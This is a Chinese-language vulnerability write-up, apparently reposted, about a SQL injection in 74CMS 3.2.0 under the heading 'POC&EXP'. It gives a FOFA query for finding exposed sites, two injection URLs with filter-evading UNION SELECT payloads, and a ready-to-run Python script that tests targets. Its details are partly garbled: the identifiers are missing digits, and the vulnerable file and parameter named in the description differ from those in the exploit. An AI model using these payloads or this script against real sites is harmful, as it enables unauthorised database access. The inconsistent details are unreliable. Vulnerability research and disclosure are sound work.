700字范文,内容丰富有趣,生活中的好帮手!
700字范文 > 74CMS(骑士CMS) 存在SQL注入漏洞(CNVD--43389)

74CMS(骑士CMS) 存在SQL注入漏洞(CNVD--43389)

时间:2019-09-02 10:05:27

相关推荐

74CMS(骑士CMS) 存在SQL注入漏洞(CNVD--43389)

文章目录

74CMS(骑士CMS) 存在SQL注入漏洞(CNVD--43389)1.74CMS(骑士CMS)简介2.漏洞描述3.影响版本4.fofa查询语句5.漏洞复现6.POC&EXP7.整改意见

74CMS(骑士CMS) 存在SQL注入漏洞(CNVD--43389)

1.74CMS(骑士CMS)简介

微信公众号搜索:南风漏洞复现文库

南风网络安全公众号首发

74CMS是太原迅易科技有限公司基于ThinkPHP框架二次开发的人才招聘系统。

2.漏洞描述

74CMS是一款基于ThinkPHP框架二次开发的人才招聘系统。 74CMS 3.2.0版本存在SQL注入漏洞。攻击者利用该漏洞可通过plus/ajax_street.php的x参数注入SQL语句。

CNVD--43389

CVE--22208

CNNVD-06-1336

3.影响版本

74CMS 3.2.0

4.fofa查询语句

app=“骑士-74CMS”

5.漏洞复现

http://192.168.31.246:3003/plus/ajax_officebuilding.php?act=key&key=錦’ a<>nd 1=2 un<>ion sel<>ect 1,2,3,version(),5,6,7,8,9%23

http://192.168.31.246:3003/plus/ajax_officebuilding.php?act=key&key=錦’ a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(123),5,6,7,8,9%23

6.POC&EXP

用法:poc.py http://127.0.0.1/

#!usr/bin/env python# *-* coding:utf-8 *-*import requestsimport jsonimport sysimport urllib3urllib3.disable_warnings()def poc(arg):vuln_url = arg + "plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(123),5,6,7,8,9%23"try:r = requests.post(vuln_url,verify=False,timeout=20,allow_redirects=False)if '202cb962ac59075b964b07152d234b70' in r.text:print('存在漏洞:'+vuln_url)except Exception as e:print('出错:'+str(e))passurl=sys.argv[1] poc(url)

7.整改意见

厂商尚未提供漏洞修复方案,请关注厂商主页更新: /

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。